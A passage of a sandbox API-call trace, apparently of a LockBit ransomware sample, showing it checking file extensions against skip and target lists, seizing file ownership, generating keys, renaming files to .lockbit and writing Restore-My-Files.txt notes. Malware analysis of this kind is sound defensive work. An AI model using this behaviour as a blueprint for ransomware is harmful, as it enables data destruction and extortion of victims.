returned -1 [0086.688] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0086.688] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0086.688] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0086.688] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0086.688] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0086.688] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0086.688] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0086.688] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0086.688] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0086.688] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0086.688] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0086.688] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0086.688] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0086.688] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0086.689] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0086.689] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0086.689] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0086.689] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0086.689] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0086.689] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0086.689] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0086.689] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0086.689] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0086.689] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png.lockbit") returned 104 [0086.689] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.690] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0086.690] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0086.690] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0086.690] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0086.691] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0086.691] RtlFreeAnsiString (AnsiString="\\") [0086.691] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0086.691] malloc (_Size=0x200) returned 0x77d800 [0086.691] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0086.691] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.691] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.691] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.692] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.692] CloseHandle (hObject=0x3b8) returned 1 [0086.692] free (_Block=0x77d800) [0086.692] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0086.693] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0086.693] malloc (_Size=0x40068) returned 0x1fb18c0 [0086.693] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3081) returned 1 [0086.693] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.694] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0086.694] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.694] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0086.695] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0086.745] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0086.745] malloc (_Size=0xe6) returned 0x1ff1e60 [0086.745] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xe6, FileInformationClass=0xa) returned 0x0 [0086.746] free (_Block=0x1ff1e60) [0086.746] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned 1 [0086.746] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt") returned 80 [0086.746] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.746] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70940f28, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70940f28, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efc9a7d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x84ca6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Panel_Mask.wmv", cAlternateFileName="")) returned 1 [0086.746] lstrcmpiW (lpString1=".", lpString2="Panel_Mask.wmv") returned -1 [0086.746] lstrcmpiW (lpString1="..", lpString2="Panel_Mask.wmv") returned -1 [0086.746] PathFindExtensionW (pszPath="Panel_Mask.wmv") returned=".wmv" [0086.746] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0086.746] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0086.746] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0086.747] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0086.747] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0086.747] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0086.747] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0086.747] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0086.747] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0086.747] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0086.747] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0086.747] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0086.747] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0086.747] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0086.747] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0086.747] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0086.747] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0086.747] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0086.747] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0086.747] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0086.747] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0086.748] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0086.748] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0086.748] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0086.748] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0086.748] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0086.748] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0086.748] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0086.748] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0086.748] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0086.748] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0086.748] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0086.748] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0086.748] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0086.748] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0086.748] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0086.748] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0086.748] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0086.749] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0086.749] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0086.749] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0086.749] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0086.749] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0086.749] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0086.749] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0086.752] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0086.752] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0086.752] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Panel_Mask.wmv") returned 1 [0086.752] lstrcmpiW (lpString1="ntldr", lpString2="Panel_Mask.wmv") returned -1 [0086.752] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Panel_Mask.wmv") returned -1 [0086.752] lstrcmpiW (lpString1="bootsect.bak", lpString2="Panel_Mask.wmv") returned -1 [0086.752] lstrcmpiW (lpString1="autorun.inf", lpString2="Panel_Mask.wmv") returned -1 [0086.752] lstrcmpiW (lpString1="thumbs.db", lpString2="Panel_Mask.wmv") returned 1 [0086.752] lstrcmpiW (lpString1="iconcache.db", lpString2="Panel_Mask.wmv") returned -1 [0086.752] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\") returned="" [0086.752] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv") returned=".wmv" [0086.774] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0086.774] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0086.774] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0086.774] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0086.774] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0086.774] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0086.774] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0086.774] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0086.774] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0086.774] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0086.774] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0086.774] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0086.774] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0086.774] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0086.775] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0086.775] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0087.009] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0087.233] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0087.246] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0087.246] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0087.247] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0087.248] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0087.248] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0087.248] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0087.248] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0087.248] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0087.248] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0087.248] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0087.250] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv.lockbit") returned 82 [0087.265] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\panel_mask.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.265] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.266] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.266] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.266] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.266] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.266] RtlFreeAnsiString (AnsiString="\\") [0087.266] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0087.266] malloc (_Size=0x200) returned 0x77d800 [0087.266] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.266] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.266] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.266] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.267] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.267] CloseHandle (hObject=0x3a0) returned 1 [0087.267] free (_Block=0x77d800) [0087.267] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\panel_mask.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0087.268] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.268] malloc (_Size=0x40068) returned 0x3d70048 [0087.268] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=543910) returned 1 [0087.268] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.268] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0087.268] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.269] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0087.269] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0087.272] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.272] malloc (_Size=0xba) returned 0x1ff1e60 [0087.272] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xba, FileInformationClass=0xa) returned 0x0 [0087.272] free (_Block=0x1ff1e60) [0087.272] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned 1 [0087.272] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt") returned 80 [0087.272] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.273] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x709b333f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x709b333f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f0d440f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x84702, dwReserved0=0x0, dwReserved1=0x0, cFileName="Panel_Mask_PAL.wmv", cAlternateFileName="")) returned 1 [0087.273] lstrcmpiW (lpString1=".", lpString2="Panel_Mask_PAL.wmv") returned -1 [0087.273] lstrcmpiW (lpString1="..", lpString2="Panel_Mask_PAL.wmv") returned -1 [0087.273] PathFindExtensionW (pszPath="Panel_Mask_PAL.wmv") returned=".wmv" [0087.273] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0087.273] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0087.273] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0087.273] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0087.273] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0087.273] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0087.273] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0087.273] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0087.273] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0087.273] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0087.273] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0087.273] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0087.273] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0087.273] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0087.273] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0087.273] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0087.273] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0087.273] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0087.273] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0087.273] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0087.274] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0087.274] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0087.275] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Panel_Mask_PAL.wmv") returned 1 [0087.275] lstrcmpiW (lpString1="ntldr", lpString2="Panel_Mask_PAL.wmv") returned -1 [0087.275] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Panel_Mask_PAL.wmv") returned -1 [0087.275] lstrcmpiW (lpString1="bootsect.bak", lpString2="Panel_Mask_PAL.wmv") returned -1 [0087.275] lstrcmpiW (lpString1="autorun.inf", lpString2="Panel_Mask_PAL.wmv") returned -1 [0087.275] lstrcmpiW (lpString1="thumbs.db", lpString2="Panel_Mask_PAL.wmv") returned 1 [0087.275] lstrcmpiW (lpString1="iconcache.db", lpString2="Panel_Mask_PAL.wmv") returned -1 [0087.275] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\") returned="" [0087.275] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv") returned=".wmv" [0087.275] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0087.275] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0087.275] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0087.275] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0087.275] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0087.275] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0087.275] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0087.275] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0087.275] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0087.275] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0087.275] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0087.275] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0087.275] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0087.275] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0087.275] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0087.275] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0087.275] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0087.275] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0087.276] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0087.276] 